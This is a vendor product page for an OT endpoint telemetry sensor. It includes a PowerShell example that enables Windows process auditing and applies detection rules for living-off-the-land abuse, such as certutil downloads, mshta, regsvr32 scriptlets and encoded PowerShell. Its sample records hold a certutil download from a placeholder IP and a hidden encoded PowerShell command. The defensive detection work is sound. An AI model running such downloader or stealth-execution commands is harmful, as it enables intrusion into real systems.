99% of attacker activity in industrial environments occurs on Windows and Linux endpoints. Most organizations cannot see any of it.
Galvanick Endpoint captures process, file system, and network telemetry from every monitored workstation and server through a telemetry-only sensor that accepts no inbound commands.
The Galvanick endpoint sensor is lightweight software installed on monitored Windows and Linux endpoints at Purdue Model Levels 2 through 3.5: engineering workstations, operator workstations, HMIs, process historians, jump hosts, DCS control servers, and SCADA servers.
User-mode only. Runs entirely above the kernel. Configures built-in OS APIs to produce EDR-style telemetry, then collects and forwards that data.
Telemetry-only by design. Once installed, the sensor does one thing: forward data. No control channel, no inbound command or attack path, no remote modification.
Minimal footprint. All analysis and detection happen off-endpoint. Telemetry terminates at a collector in your environment. Monitored endpoints do not need cloud connectivity.
The Galvanick endpoint sensor covers techniques that specifically target industrial environments, from living-off-the-land tradecraft to custom malware, anchored on proven behavior-based indicators. Detections are modeled on historic OT attack campaigns and work immediately upon deployment.
On installation, the sensors not only start detecting new threats, they also ingest historical logs and apply the full detection catalog retroactively. Attacker activity that occurred months or years before deployment surfaces immediately. How far back that reaches depends on what each host retained: events roll off once a log hits its size limit, and the relevant audit source (for example, Windows process-creation auditing) has to have been enabled for the events to exist at all.
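As an added illustration (this is not Galvanick's sensor code or its detection catalog), here is what the two ideas above reduce to on a Windows host: switching on the stock audit sources that yield EDR-style process telemetry through built-in OS facilities, then running behavior rules over 4688 process-creation events, including ones written to the Security log long before the rules existed. The rule names and patterns, host names, users and command lines below are constructed for illustration; `auditpol`, `wevtutil`, the `ProcessCreationIncludeCmdLine_Enabled` registry value and `Get-WinEvent` are standard Windows tooling.

```powershell
# Added example, not Galvanick's code. Run from an elevated prompt.
# Command-line capture in event 4688 needs Windows 8.1 / Server 2012 R2 or later
# (KB3004375 on Windows 7 / Server 2008 R2).

# --- (1) Configure the built-in telemetry sources ---------------------------------------
function Enable-ProcessAudit {
    auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable | Out-Null
    auditpol /set /subcategory:"Process Termination" /success:enable | Out-Null
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name 'ProcessCreationIncludeCmdLine_Enabled' -Value 1 -Type DWord
    # Size the Security log (1 GiB) so a collector outage does not roll events off the host.
    wevtutil sl Security /ms:1073741824
}

# --- (2) Normalize 4688 events into flat records ----------------------------------------
function ConvertFrom-ProcessCreationEvent {
    param([Parameter(ValueFromPipeline)] [System.Diagnostics.Eventing.Reader.EventRecord] $EventRecord)
    process {
        $d = @{}
        ([xml]$EventRecord.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
        [pscustomobject]@{
            Time        = $EventRecord.TimeCreated
            Host        = $EventRecord.MachineName
            User        = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
            Parent      = $d.ParentProcessName   # present on Windows 10 / Server 2016 and later
            Process     = $d.NewProcessName
            CommandLine = $d.CommandLine
        }
    }
}

# --- (3) A small, illustrative rule catalog (generic living-off-the-land patterns) -------
$ProcessRules = @(
    @{ Name = 'certutil used as downloader';      Pattern = 'certutil(\.exe)?\s.*-urlcache' }
    @{ Name = 'mshta with remote/inline script';  Pattern = 'mshta(\.exe)?\s+(https?:|vbscript:|javascript:)' }
    @{ Name = 'regsvr32 scriptlet';               Pattern = 'regsvr32(\.exe)?\s.*/i:https?:' }
    @{ Name = 'encoded PowerShell command';       Pattern = 'powershell(\.exe)?\s.*\s-e(c|nc|ncodedcommand)?\s' }
    @{ Name = 'rundll32 inline JavaScript';       Pattern = 'rundll32(\.exe)?\s.*javascript:' }
)

function Invoke-ProcessRules {
    param([Parameter(ValueFromPipeline)] $Record)
    process {
        foreach ($rule in $ProcessRules) {
            if ($Record.CommandLine -match $rule.Pattern) {
                [pscustomobject]@{
                    Rule = $rule.Name; Time = $Record.Time; Host = $Record.Host
                    User = $Record.User; Parent = $Record.Parent; CommandLine = $Record.CommandLine
                }
            }
        }
    }
}

# --- Retroactive sweep of a live host: every 4688 still in the log, however old ----------
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddYears(-3) } |
#     ConvertFrom-ProcessCreationEvent | Invoke-ProcessRules | Format-Table -AutoSize

# --- Offline run over constructed records (so the rules can be exercised anywhere) -------
# The first two records are written to trip a rule; the third is a benign service start.
$SampleRecords = @(
    [pscustomobject]@{ Time = '2022-03-14 02:17:09'; Host = 'EWS-01'; User = 'PLANT\eng1'
        Parent = 'C:\Windows\explorer.exe'; Process = 'C:\Windows\System32\certutil.exe'
        CommandLine = 'certutil.exe -urlcache -split -f http://203.0.113.5/u.dat C:\Users\eng1\u.dat' }
    [pscustomobject]@{ Time = '2024-01-09 11:40:52'; Host = 'HMI-07'; User = 'PLANT\operator'
        Parent = 'C:\Program Files\Vendor\hmi.exe'; Process = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA' }
    [pscustomobject]@{ Time = '2024-05-22 08:03:11'; Host = 'HIST-01'; User = 'PLANT\svc_hist'
        Parent = 'C:\Windows\System32\services.exe'; Process = 'C:\Program Files\Historian\hist.exe'
        CommandLine = '"C:\Program Files\Historian\hist.exe" -service' }
)
$SampleRecords | Invoke-ProcessRules | Format-Table -AutoSize
```

Two practical caveats: a domain GPO audit policy overrides whatever `auditpol` sets locally, so verify with `auditpol /get /category:"Detailed Tracking"` after a policy refresh; and the retroactive sweep can only find what the host kept, so if Process Creation auditing was off or the Security log had already wrapped, there is nothing to replay the rules against.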
Every Galvanick finding includes the affected endpoint, the user account, the specific process, and a complete timeline of related activity.
Findings include recommended next steps based on the specific threat detected and the observed behavior. Findings appear in Galvanick's UI and can also be forwarded to your existing SIEM or directly to messaging platforms like Slack, Teams, and Outlook.
Galvanick can also query your operations team directly through your messaging platform to validate observed activity in real time.
EDR tools can deliver the endpoint telemetry OT environments need. The problem is that these solutions are inherently risky.
We built the Galvanick endpoint sensor to accommodate any and all OT environments and risk profiles. It provides critical visibility and security coverage without introducing new points of failure.
Galvanick can connect your endpoint telemetry to the tools you already operate. This enriches network security alerts with user and process attribution, utilizes change management records for automated validation of observed activity, and transforms messaging platforms into interactive response channels.
Network security monitoring: Nozomi, Dragos, Forescout, Claroty, or use Galvanick’s own sensor
Infrastructure: Palo Alto Networks, Fortinet, Cisco, and others
Applications: ServiceNow, BMC Remedy, and others
Messaging: Slack, Microsoft Teams, and Outlook
Deploy the Galvanick analytics engine in the cloud or on-premises. Endpoint sensors install in seconds per host with no reboot or internet access required, and do not self-update: Galvanick adheres to your change management process.
Distribute sensor installs on Purdue 2-3.5 endpoints via GPO, SCCM, Intune, network share, or USB for air-gapped environments, and deploy the Galvanick collector as a container image, VM image, or physical appliance.
Galvanick's endpoint sensor supports a range of operating systems:
Windows XP and up
Windows Server 2008 and up
Windows IoT Enterprise 10/11
Linux (kernel 2.6.32 and up)
Running something we don't cover yet? We build and prioritize new OS support based on customer needs.